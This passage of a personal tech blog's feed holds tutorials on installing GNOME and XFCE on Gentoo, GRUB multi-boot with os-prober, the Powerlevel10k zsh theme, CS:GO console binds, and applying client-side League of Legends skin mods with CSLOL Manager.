echo &quot;&gt;=gui-libs/gtk-4.10.5 X&quot; &gt; /etc/portage/package.use/gtk
echo &quot;&gt;=x11-libs/gtk+-3.24.8:3.0 X&quot; &gt; /etc/portage/package.use/gtk+
echo &quot;&gt;=dev-cpp/gtkmm-3.24.8:3.0 X&quot; &gt; /etc/portage/package.use/gtkmm
echo &quot;&gt;=x11-base/xorg-server-21.1.8-r2 -minimal&quot; &gt; /etc/portage/package.use/xorg-server
```

## Step 4: Install GNOME Base

Now, let&apos;s install the GNOME base packages. Brace yourself; this process can be time-consuming, as it involves compiling over 400 packages. Just take a break :)

```shell
emerge --ask --verbose gnome-base/gnome
```

## Step 5: Update Environment and Profile

With GNOME base successfully installed, update your environment and profile settings to reflect the changes:

```shell
env-update &amp;&amp; source /etc/profile
```

## Step 6: Enabling Elogind for Enhanced GNOME Experience

Elogind is a vital component that enhances your GNOME desktop environment, ensuring a seamless and feature-rich experience. It provides essential services for managing user sessions, enabling features like auto-login and power management. Here&apos;s how to enable Elogind:

### Add Elogind to the System Startup

Begin by adding Elogind to your system&apos;s startup processes. This ensures that Elogind launches with your system during boot-up. Execute the following command:

```shell
rc-update add elogind boot
```

### Start Elogind Now

You can initiate Elogind immediately using the following command:

```shell
rc-service elogind start
```

Enabling Elogind is a crucial step in preparing your Gentoo system to deliver a flawless GNOME desktop experience. Its role in managing user sessions is pivotal, and it paves the way for the activation of various GNOME features.

## Step 7: Installing the Display Manager Initialization Script

To finalize your GNOME setup, you&apos;ll need to install the display manager initialization script. This script ensures that your GNOME desktop environment starts efficiently and securely with each system boot:

```shell
emerge --ask --noreplace gui-libs/display-manager-init
```

## Step 8: Configuring the Display Manager

To make GDM (GNOME Display Manager) the default display manager for your system, a quick configuration change is required. Follow these steps:

### Open the Configuration File

Use the nano text editor to open the configuration file for editing:

```shell
nano /etc/conf.d/display-manager
```

### Set GDM as the Default Display Manager

Within the file, locate the `DISPLAYMANAGER` variable and set it to &quot;gdm&quot; like this:

```shell
DISPLAYMANAGER=&quot;gdm&quot;
```

### Ensure Automatic Start at Boot

To guarantee that GDM starts automatically during system boot, add it to the default runlevel with the following command:

```shell
rc-update add display-manager default
```

With these configurations in place, you&apos;re ready to start the display manager:

```shell
rc-service display-manager start
```

These final steps solidify GDM as your default display manager, ensuring a smooth and reliable GNOME desktop experience.

## Optional: Disabling GNOME Online Accounts

GNOME offers built-in options for seamlessly connecting your online accounts. However, if you prefer not to utilize this feature, you can easily disable it by adjusting your USE flags. Follow these steps to disable GNOME Online Accounts:

### Step 1: Open your `make.conf` file

To begin, open your `make.conf` file using a text editor. You can use the `nano` text editor for this purpose:

```shell
nano /etc/portage/make.conf
```

### Step 2: Modify your USE flags

Inside the `make.conf` file, locate the line containing your USE flags. Add &quot;-gnome-online-accounts&quot; to the list of flags, like so:

```shell
USE=&quot;... -gnome-online-accounts&quot;
```

This modification informs Gentoo not to include the GNOME Online Accounts feature during package installations.

### Step 3: Rebuild your packages

Apply the changes you&apos;ve made to your USE flags by rebuilding your packages. Use the following command:

```shell
emerge --ask --changed-use --update --deep @world
```

This command ensures that your system updates the packages and considers your modified USE flags.

### Step 4: Reboot your system

To activate these changes, simply reboot your Gentoo system. Once completed, you&apos;ll notice that the Online Account options have been removed from your GNOME desktop environment.

## Summary

Congratulations! You&apos;ve successfully installed GNOME on your Gentoo system. Enjoy your Gentoo system!

## References

- [Gentoo wiki: Wayland](https://wiki.gentoo.org/wiki/Wayland)
- [Gentoo wiki: GNOME/Guide](https://wiki.gentoo.org/wiki/GNOME/Guide)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>League of Legends: A step-by-step guide to customizing skins using CSLOL Manager</title><link>https://ummit.dev//posts/games/lol/cslol-manager/</link><guid isPermaLink="true">https://ummit.dev//posts/games/lol/cslol-manager/</guid><description>Discover how to relive the nostalgia of old-school League of Legends by customizing your skins with CSLOL Manager. Follow these simple steps to transform your gaming experience.</description><pubDate>Sun, 24 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In this blog, we will explore how to customize your League of Legends (LoL) skins effortlessly using CSLOL Manager. You won&apos;t need to use any complex commands; it&apos;s all about user-friendly customization.

### What is CSLOL Manager?

CSLOL Manager allows you to apply custom skins created by the community to your League of Legends client. However, it&apos;s important to note that these skins are only visible to you; other players won&apos;t see your modified skins. In essence, it&apos;s a client-side modification that lets you personalize your LoL experience.

### Why Customize Your Skins?

League of Legends has evolved over time, and for some players, the nostalgia of the past versions still holds a special place. Customizing your skins can help recreate that old-school LoL experience, allowing you to relive the game&apos;s earlier days. It&apos;s not just about winning or losing; it&apos;s about cherishing the memories.

However, it&apos;s important to understand that the official developers won&apos;t revert to old skins. For them, progress means moving forward, and the past is left behind. But with CSLOL Manager, you have the power to modify LoL to your heart&apos;s content. Once you&apos;ve created your desired skins, CSLOL Manager makes it easy to apply them.

### Is There a Risk of Being Banned?

Changing champion skins in League of Legends does come with some uncertainty. It&apos;s about altering the visual elements of the game, which could potentially affect the game&apos;s outcome. Riot Games generally allows skin changes that don&apos;t impact gameplay.

However, there&apos;s a slight risk of account suspension in some cases. To stay safe, avoid changing skins that you&apos;ve paid for. Many players, including the author, have changed skins for years without facing any bans, so it&apos;s generally a safe practice.

### Is CSLOL Manager Safe?

CSLOL Manager is an open-source program, and you can even build it yourself from the source code. Using it this way is considered safer. As for the skins themselves, it depends on your trust level. You can test files for viruses if you have the means, as CSLOL Manager serves as a convenient way to download these skins. The files are hosted on platforms like MediaFire, so exercise caution based on your level of trust.

Now, let&apos;s delve into the steps to change your skins.

## Step 1: Install CSLOL Manager and Run the Program

CSLOL Manager is open-source software, not proprietary, and its code can be found on GitHub. [Here](https://github.com/LeagueToolkit/cslol-manager) is the link to the GitHub repository.

1. To download CSLOL Manager, click [here](https://github.com/LeagueToolkit/cslol-manager/releases/tag/2023-09-17-cb6885f) (as shown in the image below).

![Download CSLOL Manager](./download-cslol-manager.png)

2. After downloading the file, extract `cslol-manager-windows.exe` from the archive.

3. Run the program by clicking `.\cslol-manager\cslol-manager.exe`.

## Step 2: Set the LoL Path

Configuring the path to your League of Legends files is crucial for the skin changes to take effect.

1. Click the Settings icon.

![Change Path Settings 1](./Setting-PATH-1.png)

2. Click on &quot;CHANGE GAME FOLDER.&quot;

![Change Path Settings 2](./Setting-PATH-2.png)

3. Click &quot;BROWSE.&quot;

![Change Path Settings 3](./Setting-PATH-3.png)

4. Locate your LoL path. By default, it&apos;s often found at `Program Files\Riot Games\League of Legends\Game\League of Legends.exe` (if you haven&apos;t changed it).

![Change Path Settings 4](./Setting-PATH-4.png)

## Step 3: Find Your Favorite Skin on Killerskins or Runeforge

Websites like [Killerskin](https://killerskins.com/) and [Runeforge](https://www.runeforge.io/mods) host a variety of custom skins. Simply browse these websites to find a skin you like, and then download either the zip file or the *.fantome file.

As an example, let&apos;s download an [old jungle monsters](https://killerskins.com/frachlitz/mods/misc/jungle-creeps/old-jungle-monsters-rift-herald/) skin. You can find the download link [here](https://drive.google.com/file/d/1-ha5O7lo4ImbGKALrK9PzX-DaMYWf8OU/view).

## Step 4: Apply Your Skins

1. Switch back to the CSLOL Manager application.

2. Click &quot;Import New Mod.&quot;

![Import 1](./IMPORT-1.png)

3. Locate the downloaded skin file and click on it.

4. After importing, you should see it listed as shown below.

![Import 2](./IMPORT-2.png)

5. Enable the skin by checking the checkbox next to it.

6. Click &quot;RUN.&quot;

![Done](./Done.png)

7. You should now see the following message displayed: Status: Waiting for league match to start.

## Final Step: Test Your Skin

Now, open League of Legends and start a match; you should see your modified skin in-game.

&gt;Tips: If the League of Legends client was already running when you applied the skin, restart the client first; after that, the modified skin should appear.

![Done](./Display.png)

## Impressions

Customizing League of Legends skins to resemble the old-school style brings back fond memories. Imagine being back in 2014, when an item called &quot;Deathfire Grasp&quot; still existed: playing as LeBlanc and executing the perfect combo to obliterate every opponent: `&lt;Deathfire Grasp&gt;&lt;Q&gt;&lt;R&gt;&lt;W&gt;&lt;E&gt;`. It didn&apos;t matter if they were a tank; it was a one-shot wonder.

Those days are long gone, but they remain preserved in my cherished memories. Haha ...

## References

- [Github: CSLOL Manager](https://github.com/LeagueToolkit/cslol-manager)
- [Home - KillerSkins](https://killerskins.com/)
- [MODS | RuneForge](https://www.runeforge.io/mods)
- [How To Install Custom Skins &amp; Maps In League of Legends](https://onion.tube/watch?v=BGVK4ZwGa6c)
- [Top 5 Removed Items from League of Legends [2017]](https://onion.tube/watch?v=5bo3G3avGNo)
- [[閒聊] 請問冥火之擁，當年有多強? - 看板 LoL - 批踢踢實業坊](https://www.ptt.cc/bbs/LoL/M.1693984221.A.B70.html)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Enhance Your CS:GO Gameplay with These Useful Commands!</title><link>https://ummit.dev//posts/games/counter-strike/go/csgo-useful-command/</link><guid isPermaLink="true">https://ummit.dev//posts/games/counter-strike/go/csgo-useful-command/</guid><description>Unlock the full potential of your CS:GO gameplay with these essential commands! From optimizing your crosshair to performing quick actions, these commands can give you the edge you need to succeed in the game.</description><pubDate>Sat, 23 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Counter-Strike: Global Offensive (CS:GO) is a highly competitive first-person shooter that demands precision and quick reflexes. To gain an edge in the game, mastering essential commands can be a game-changer. In this guide, we&apos;ll explore some valuable commands that can enhance your CS:GO gameplay.

## Enable developer console

Enabling the developer console in CS:GO allows you to access various commands and settings for customization and debugging. There are two ways to enable it.

### Way 1: Through In-Game Settings

This method involves going into the game settings and enabling the developer console.

1. **Launch CS:GO**: Open Steam, go to your library, and launch Counter-Strike: Global Offensive.

2. **Open the Game Settings**: Click on the gear icon in the bottom left corner of the main menu screen. This will open the game settings.

3. **Go to the Game Tab**: In the game settings, click on the &quot;Game&quot; tab on the left-hand side.

4. **Enable Developer Console**: Look for the &quot;Enable Developer Console (~)&quot; option. It&apos;s usually near the bottom of the list. Click the checkbox to enable it.

![](https://img.gurugamer.com/resize/740x-/2019/07/12/d0iuv-d53f.png)

5. **Apply Settings**: After enabling the developer console, make sure to click the &quot;Apply&quot; or &quot;OK&quot; button to save your changes.

6. **Access the Console**: To open the developer console while in-game, press the tilde key (~) on your keyboard. This key is usually located just below the Escape (Esc) key and to the left of the &quot;1&quot; key on most keyboards.

Once you&apos;ve enabled the developer console, you can press the tilde key to toggle it on and off, and you&apos;ll be able to enter various commands to customize your CS:GO experience.

### Way 2: Adding a Launch Option

You can enable the developer console by adding the `-console` launch option to CS:GO. Here&apos;s how to do it:

1. Open Steam.
2. Right-click on &quot;Counter-Strike: Global Offensive&quot; in your Steam library.
3. Select &quot;Properties.&quot;
4. In the &quot;General&quot; tab, click on the &quot;Set Launch Options&quot; button.
5. In the launch options box, type `-console`.
6. Click &quot;OK&quot; to save your changes.
7. Launch CS:GO, and the developer console will be enabled automatically.

Using either method works, so you can choose the one that you find more convenient.

As with the first method, once the developer console is enabled, you can press the tilde key to toggle it on and off.

### 1. Clearing Bullet Decals on the Fly

```shell
bind shift &quot;+speed; r_cleardecals&quot;
```

One of the subtle yet effective commands in CS:GO is the ability to clear bullet decals from surfaces. By binding this action to your &quot;shift&quot; key, you can clean up bullet holes and blood splatters quickly, ensuring that your view remains unobstructed during intense firefights.

### 2. Perfect Your Jump Throws

```shell
alias &quot;+jumpthrow&quot; &quot;+jump; -attack&quot;; alias &quot;-jumpthrow&quot; &quot;-jump&quot;; bind alt &quot;+jumpthrow&quot;
```

Precise grenade throws are essential in CS:GO, and the &quot;+jumpthrow&quot; command can help you achieve consistency. Binding it to the &quot;alt&quot; key allows you to execute a perfect jump throw every time. This can be a game-changer when coordinating grenade throws with your team.

### 3. Quick Weapon and C4 Management

```shell
bind x &quot;use weapon_c4; drop&quot;
```

Efficiency in managing your weapons and the C4 explosive is crucial. Binding the &quot;x&quot; key to this command allows you to swiftly switch to your C4 and drop it, streamlining your actions during bomb plant scenarios.

### 4. Switch Your Weapon Hand Preference

```shell
bind mouse4 &quot;toggle cl_righthand 0 1&quot;
```

CS:GO offers players the option to choose their weapon hand preference, either right-handed or left-handed. By binding this command to the &quot;mouse4&quot; button, you can toggle between the two settings on the fly. Experiment with both to find the one that suits your aiming style best.

### 5. Adjust Crosshair Size for Different Weapons

```shell
bind 2 &quot;slot2 ; cl_crosshairsize 3&quot;
```

Maintaining a consistent crosshair size across all weapons can improve your accuracy. This command binds the &quot;2&quot; key to switch to your secondary weapon and simultaneously adjusts the crosshair size to &quot;3.&quot; Customize the crosshair size to match your preferences for various weapons.
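Rather than typing these binds into the console every session, you can collect them in an `autoexec.cfg` file that CS:GO loads on startup. A sketch using the binds from this guide (the file typically lives under `Steam/steamapps/common/Counter-Strike Global Offensive/csgo/cfg`, and you add `+exec autoexec.cfg` to the game&apos;s launch options):

```shell
// autoexec.cfg: executed on startup via the +exec launch option
bind shift &quot;+speed; r_cleardecals&quot;
alias &quot;+jumpthrow&quot; &quot;+jump; -attack&quot;; alias &quot;-jumpthrow&quot; &quot;-jump&quot;; bind alt &quot;+jumpthrow&quot;
bind x &quot;use weapon_c4; drop&quot;
bind mouse4 &quot;toggle cl_righthand 0 1&quot;
bind 2 &quot;slot2 ; cl_crosshairsize 3&quot;
```

This way, all of your custom binds survive game restarts and settings resets.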

## Conclusion

Mastering these commands can help you gain an advantage in CS:GO by streamlining your gameplay and allowing you to focus on what truly matters: outsmarting your opponents. Experiment with these commands in practice games to fine-tune your skills, and you&apos;ll be well on your way to becoming a more formidable CS:GO player.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Creating a Multi-OS Boot Menu with GRUB</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-boot-os-prober-and-efibootmgr/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-boot-os-prober-and-efibootmgr/</guid><description>Learn how to set up a multi-OS boot menu using Grub and os-prober, ensuring hassle-free switching between different operating systems on your computer.</description><pubDate>Sat, 23 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

For those of us who have ventured into the world of dual-boot systems, we know that it can be both a blessing and a headache. While I&apos;ve personally transitioned to GPU passthrough for a smoother multi-system experience, dual-booting remains a practical option for many. In this article, I&apos;ll guide you through setting up a multi-OS boot menu using Grub and os-prober.

### Why? (Fuck Windows)

Windows updates have a knack for causing trouble, especially when it comes to your boot-loader. They can mess up your Grub configuration, leaving you without the familiar boot menu to choose your operating system. In such cases, you&apos;d have to manually access the boot menu to select the system you want to run.

Windows tends to be the culprit here, often disrupting your boot loader, preventing Grub from automatically appearing.

A piece of advice for those planning to install both Windows and Linux: it&apos;s generally smoother to install Windows first and then allocate disk space for Linux. If you install Linux first and then add Windows later, you&apos;ll likely need to reconfigure your Linux boot-loader because, more often than not, Windows will disrupt it.

## Getting Prepared

Before we dive into configuring Grub and os-prober, you should already have both Linux and your other operating system (be it Debian, Arch, or Windows) installed. What you&apos;re missing is the boot loader for both systems.

### Step 1: Install GRUB

Let&apos;s start by installing Grub on your system with this command:

```shell
sudo pacman -S grub
```

### Step 2: Do You Need efibootmgr?

Whether you need to install efibootmgr depends on whether your system uses UEFI. Here&apos;s when you&apos;d want to install it:

- Your system is UEFI-based.
- You&apos;re setting up a dual-boot configuration or managing UEFI boot entries for multiple operating systems.

If these conditions apply to your system, use this command to install efibootmgr:

```shell
sudo pacman -S efibootmgr
```

### Step 3: Install os-prober

To proceed, you need to detect if there are multiple systems on your device. Use the following command to install os-prober:

```shell
sudo pacman -S os-prober
```

### Step 4: Edit Grub Config File

Now that os-prober is installed, it&apos;s time to enable Grub to use it. By default, Grub doesn&apos;t run os-prober to detect other systems, but you can change that. Use the following command to add a line to your Grub settings:

```shell
echo &apos;GRUB_DISABLE_OS_PROBER=false&apos; | sudo tee -a /etc/default/grub
```

#### Explanation

What does this line do? Normally, Grub doesn&apos;t automatically detect if you have multiple systems. But by adding `GRUB_DISABLE_OS_PROBER=false`, you enable Grub to do just that.

&gt;This step is crucial for adding dual-boot options to your menu.

### Final Step: Adding Boot Options to the Menu

Identify where your EFI System Partition is mounted using the `lsblk` command. For example, if it&apos;s mounted at `/boot/efi`, use the following command:

```shell
sudo grub-install --target=x86_64-efi --efi-directory=/boot/efi
```

Next, regenerate the configuration with this command:

```shell
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

### Finished!

After completing these steps, reboot your system. You should now see a list of other distributions or operating systems on your Grub menu. Enjoy the convenience of a multi-OS boot menu!

## References

- [Adding Other Operating Systems to the GRUB Bootloader](https://www.baeldung.com/linux/grub-bootloader-add-new-os)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Oh my zsh: Installing Powerlevel10k Theme</title><link>https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install-powerlevel10k-theme/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install-powerlevel10k-theme/</guid><description>Elevate your command-line experience with the Powerlevel10k theme for Oh My Zsh. Follow our step-by-step guide to seamlessly install and customize this powerful theme, making your terminal both visually appealing and highly functional.</description><pubDate>Sat, 23 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Tired of the same old look of your Oh My Zsh terminal? Want something more stylish and functional? Look no further than the Powerlevel10k theme, a specially designed theme for Oh My Zsh that brings beauty and functionality to your terminal.

## Getting Prepared

Before we dive into the installation of Powerlevel10k, make sure you have Oh My Zsh installed on your system. Powerlevel10k is designed as a theme for Oh My Zsh, so having Oh My Zsh is a prerequisite.

### Step 1: Installing Required Fonts

To ensure that Powerlevel10k displays correctly, it&apos;s highly recommended to install the Meslo Nerd Font. This font is officially recommended by both Oh My Zsh and Powerlevel10k for the best visual experience. Without it, some text or icons may not display correctly in your terminal.

Choose the font style that suits your preferences:

- [MesloLGS NF Regular.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Regular.ttf)
- [MesloLGS NF Bold.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Bold.ttf)
- [MesloLGS NF Italic.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Italic.ttf)
- [MesloLGS NF Bold Italic.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS%20NF%20Bold%20Italic.ttf)
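On Linux, a common way to install the downloaded fonts is to copy them into your user font directory and refresh the font cache. A sketch assuming the four `.ttf` files ended up in `~/Downloads` (adjust the path to wherever you saved them):

```shell
# Install the Meslo fonts for the current user only.
mkdir -p ~/.local/share/fonts
mv ~/Downloads/MesloLGS*.ttf ~/.local/share/fonts/
# Rebuild the font cache so applications can find the new fonts.
fc-cache -f ~/.local/share/fonts
```

On Windows or macOS, simply open each font file and click &quot;Install.&quot;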

### Step 2: Configuring Your Terminal Fonts

Configuring fonts in your terminal depends on the terminal emulator you are using. Each terminal emulator has different options and locations for font settings. In general, you need to access your terminal&apos;s settings and select the specific font you downloaded (Meslo Nerd Font) to ensure it&apos;s displayed correctly. (As shown in the image below):

![fonts](./fonts.png)

### Step 3: Installing Powerlevel10k for Oh My Zsh

Installing Powerlevel10k is a breeze, and it only requires two simple commands. Here&apos;s how you can do it:

1. Powerlevel10k provides a convenient installation script. Copy and paste the following commands into your terminal to install Powerlevel10k:

```shell
git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ~/powerlevel10k
echo &apos;source ~/powerlevel10k/powerlevel10k.zsh-theme&apos; &gt;&gt; ~/.zshrc
```

2. After executing these commands, it&apos;s time to give your terminal a quick refresh. Restart your terminal session.

3. When you launch your terminal again, you&apos;ll be greeted with the Powerlevel10k configuration wizard. This interactive wizard makes it easy to customize your Powerlevel10k theme to your liking. You can make choices by selecting options with number keys and confirming them with y/n responses.

4. Once you&apos;ve completed the configuration wizard, your Powerlevel10k theme will be ready to roll!

With just a few simple steps, you&apos;ll have Powerlevel10k up and running, enhancing the look and functionality of your Oh My Zsh terminal. Enjoy your newly customized and powerful terminal experience!

## Updating Powerlevel10k

To keep your Powerlevel10k theme up to date, you can easily pull the latest updates using Git. Run the following command:

```shell
git -C ~/powerlevel10k pull
```

## Optional: Displaying Shortened Paths

If you find the display of the full path in your terminal too lengthy and prefer a shorter representation, you can configure Powerlevel10k to display only the last part of the path. Here&apos;s how:

1. Edit the `~/.p10k.zsh` file:

```shell
vim ~/.p10k.zsh
```

2. In the Vim editor, search for the text `POWERLEVEL9K_SHORTEN_STRATEGY` by typing `/`.

3. Change the value of this parameter to `truncate_to_last`.

4. Save the changes and exit the editor.

5. Restart your terminal to see the updated path display.
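After the change, the relevant line in `~/.p10k.zsh` should look roughly like this (the `typeset -g` form is how the stock config declares its options):

```shell
# Show only the last segment of the current path in the prompt.
typeset -g POWERLEVEL9K_SHORTEN_STRATEGY=truncate_to_last
```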

With these steps, you&apos;ll have successfully enhanced your Oh My Zsh experience with the visually appealing and feature-rich Powerlevel10k theme. Enjoy your customized and powerful terminal!

## Conclusion

Congratulations! You&apos;ve successfully transformed your Oh My Zsh terminal into a powerful and beautifully customized environment with the Powerlevel10k theme. This elegant theme not only enhances the aesthetics of your terminal but also provides useful features and configurations for a more efficient workflow.

By following the steps in this guide, you&apos;ve achieved the following:

1. **Installed Meslo Nerd Fonts:** Ensured that your terminal can display icons and text correctly by installing the recommended Meslo Nerd Fonts.

2. **Set Up Terminal Fonts:** Configured your terminal to use the Meslo Nerd Font you installed, making sure everything looks as intended.

3. **Installed Powerlevel10k:** Installed the Powerlevel10k theme with a simple script and customized it during the setup process, tailoring it to your preferences.

4. **Optional: Shortened Path Display:** Learned how to shorten the display of the current directory in your terminal for a cleaner and more efficient prompt.

Now, your terminal not only looks great but is also a powerful tool that can boost your productivity. You can use it for coding, system administration, or any other tasks with ease.

## References

- [Github: Powerlevel10k](https://github.com/romkatv/powerlevel10k)
- [zsh: Customizing Powerleve10k prompt](https://stackoverflow.com/questions/61176257/customizing-powerleve10k-prompt)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Comprehensive Guide to Gentoo Linux: Installing XORG, XFCE and LightDM with OpenRC</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-install-xfce-xorg-lightdm/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-install-xfce-xorg-lightdm/</guid><description>Gentoo Linux of installing XORG, XFCE and LightDM with the OpenRC init system. Dive into the realm of open-source customization and create a powerful and tailored desktop environment on your Gentoo system.</description><pubDate>Wed, 20 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In our previous blog, we successfully installed Gentoo Linux and set up the system on our disk. However, at this point, our system lacks a graphical user interface (GUI), making it necessary to install a Desktop Environment (DE) to provide a more user-friendly experience. In this guide, we will walk you through the process of installing the XFCE DE on your Gentoo system using OpenRC as the init system.

### Why Choose XFCE?

XFCE is an excellent choice for those seeking a lightweight and efficient desktop environment. Unlike resource-intensive alternatives like GNOME or KDE, XFCE is incredibly light on system resources, requiring less than 200MB of RAM to run smoothly. Its minimalistic design and efficient performance make it ideal for older hardware or users who prefer a snappy and responsive desktop experience. Additionally, XFCE has shorter compilation times during the installation process, making it an attractive option for Gentoo users. Let&apos;s dive into the installation process and get XFCE up and running on your Gentoo Linux system.

## Step 0: Update Your System

Before diving into the XFCE installation, it&apos;s crucial to ensure that your Gentoo system is up to date with the latest package information. You can achieve this by running the following commands:

```bash
sudo emerge --sync
sudo emerge --ask --update --deep --newuse @world
```

### Step 1: Adjust Your `make.conf`

Gentoo&apos;s strength lies in its USE flags, which allow us to fine-tune package compilation to meet our specific requirements. To get XFCE up and running, we need to enable specific USE flags.

```shell
nano /etc/portage/make.conf
```

Add the following lines to your `make.conf`:

```shell
USE=&quot;X elogind dbus&quot;
INPUT_DEVICES=&quot;libinput&quot;
VIDEO_CARDS=&quot;qxl&quot;
```

These flags enable X support, integrate elogind for session management, and set up D-Bus communication. They also configure input devices to use libinput and set the video driver to QXL. Note that `qxl` is the driver for QEMU/SPICE virtual machines; on physical hardware, list your actual GPU driver instead (for example `amdgpu`, `intel`, or `nvidia`).

### Step 2: Configure elogind to Start on Boot

Elogind is essential for session management in XFCE. Ensure that it starts automatically during boot:

```shell
rc-update add elogind boot
```

### Step 3: Ensuring Graphics Driver Compatibility

Before we dive into the XFCE installation, it&apos;s vital to confirm that our system has the requisite graphics drivers in place. This step helps us avoid potential issues and ensures a smooth XFCE installation.

Run the following command to perform a dry run and simulate the installation of essential graphics drivers:

```shell
emerge --pretend --verbose --ask x11-base/xorg-drivers
```

&gt;Tips: This command meticulously checks and confirms that we have the necessary graphics drivers ready to support XFCE. Ensuring the compatibility of these drivers is paramount to a successful XFCE setup.

Now, let&apos;s proceed confidently, knowing that our system is well-prepared for the XFCE installation journey.

### Step 4: Declutter for a Pristine System

A well-maintained system is a happy system. It&apos;s time to declutter your Gentoo environment and bid farewell to any unnecessary packages. This not only keeps your system running smoothly but also frees up precious space.

Let&apos;s get started with the cleanup:

```shell
emerge --ask --depclean --verbose
```

&gt; **Tips:** While this step might not always be mandatory, it&apos;s a good practice to keep your system tidy and avoid any potential errors down the road. Plus, who doesn&apos;t love a clean and efficient system? 😉🌟

### Step 5: Fine-Tune Poppler Settings

To ensure compatibility and prevent conflicts, we&apos;ll instruct the Poppler library not to use Qt5:

```shell
echo &quot;app-text/poppler -qt5&quot; &gt; /etc/portage/package.use/poppler
```

### Step 6: Manual Configuration for libdbusmenu

In some cases, manual configuration is necessary, and libdbusmenu is no exception. Let&apos;s ensure libdbusmenu is properly set up:

Please note that the required version may change over time (at the time of writing it is `16.04.0-r2`). If you encounter any issues, run the installation command once; the terminal will print the exact lines you need to echo. Simply follow the prompts to resolve any version-related discrepancies.

Run the following command to set up libdbusmenu with the appropriate configuration:

```shell
echo &quot;&gt;=dev-libs/libdbusmenu-16.04.0-r2 gtk3&quot; &gt; /etc/portage/package.use/libdbusmenu
```

With these steps complete, your Gentoo system is now primed and ready to welcome the XFCE desktop environment.

## Gentoo: Installing XFCE

Now comes the exciting part—installing XFCE, XORG and LightDM on your Gentoo system.

### Step 7: Installing XFCE

Execute the following command to install XFCE:

```shell
emerge --ask --verbose xfce-base/xfce4-meta
```

This command installs the XFCE meta-package, which includes all the core components of the XFCE desktop environment. It ensures that you have a complete XFCE experience with all the necessary applications and utilities.

### Step 8: Don&apos;t Forget the Terminal

In the world of Linux, the terminal is your trusty companion, your guiding star through the vast universe of commands and tasks. Just like having hands and feet, you can&apos;t navigate Linux comfortably without it. So, let&apos;s make sure you have your terminal ready for action!

&gt;You can skip this step: `xfce4-meta` already includes the terminal, so it does not need to be installed separately.

```shell
emerge --ask --verbose x11-terms/xfce4-terminal
```

### Step 9: Configuring Your XFCE Session

Before we dive into your XFCE desktop, let&apos;s ensure that your system knows how to start it. We&apos;ll create a command to initiate XFCE.

```shell
echo &quot;exec startxfce4&quot; &gt; ~/.xinitrc
```

Alternatively, if you prefer a quicker way, you can start the session directly without editing `~/.xinitrc`:

```shell
startxfce4
```

With this configuration in place, you&apos;re all set to experience the XFCE desktop environment. Simply execute the command, and you&apos;ll be greeted by the XFCE screen on your system. Enjoy the XFCE experience tailored to your liking!

#### Testing Launching XFCE

With everything set up and ready, it&apos;s time to test your XFCE configuration on your Gentoo system. When you log in to your user account, simply type the following command to start your XFCE session:

```shell
startx
```

And there you have it: your Gentoo system now has a desktop environment installed (as shown in the image below):

![Started XFCE](./Gentoo-xfce-start.png)

## Step 10: Creating a Normal User

Before we proceed with the installation of LightDM for XFCE, it&apos;s essential to create a dedicated normal user. By default, LightDM does not permit root user login, so having a normal user is necessary. Additionally, it&apos;s not recommended to perform everyday tasks as the root user for security reasons. Here&apos;s a quick guide on creating a normal user:

```shell
# Create a new user with necessary group memberships and set the shell to /bin/bash
useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;
```

- `useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;`: This command creates a new user account with the specified `&lt;username&gt;` and assigns it to essential groups, including &quot;users,&quot; &quot;wheel,&quot; and &quot;audio.&quot; The `-m` flag ensures a home directory is created for the user, and the `-s /bin/bash` flag sets the user&apos;s default shell to `/bin/bash`.

Next, set the user&apos;s password:

```shell
passwd &lt;username&gt;
```

## Step 11: Installing LightDM Display Manager

If you&apos;ve noticed that some essential functions, such as power off or logout, are not working in your XFCE environment, it&apos;s likely due to the absence of a Display Manager. For XFCE, LightDM is a highly recommended Display Manager. Follow these steps to install it:

```shell
emerge --ask x11-misc/lightdm
```

### Step 12: Edit the `display-manager` File

Now, let&apos;s configure LightDM as the default Display Manager. Open the `display-manager` file and set the value to `lightdm`:

```shell
nano /etc/conf.d/display-manager
```

The file should look like this:

```shell
DISPLAYMANAGER=&quot;lightdm&quot;
```

### Step 13: Start LightDM on Boot

To ensure LightDM starts automatically with your system, add both `dbus` and `display-manager` to the default runlevel. The `dbus` service is essential as LightDM depends on it for passing messages:

```shell
rc-update add dbus default
rc-update add display-manager default
```

### Step 14: Start LightDM

It&apos;s time to start LightDM:

```shell
rc-service dbus start
rc-service display-manager start
```

Once LightDM is successfully started, your system should look similar to the image below:

![lightdm](./LightDM-start.png)

## Accessing Terminal in TTY Mode

In some cases, you might encounter issues logging into your desktop session or accessing the terminal from within the desktop environment. Here&apos;s a quick workaround to access the terminal using TTY (Teletype) mode:

1. Press the following key combination to access TTY mode:

   ```shell
   Ctrl + Alt + F1
   ```

   This key combination will take you to the first virtual terminal (TTY1).

2. In the TTY1 terminal, you can create your user account if needed or perform other tasks as necessary. To create a user account, you can follow the steps mentioned in a previous section.

3. Once you&apos;ve completed your tasks in TTY1, log out of the virtual terminal by typing:

   ```shell
   logout
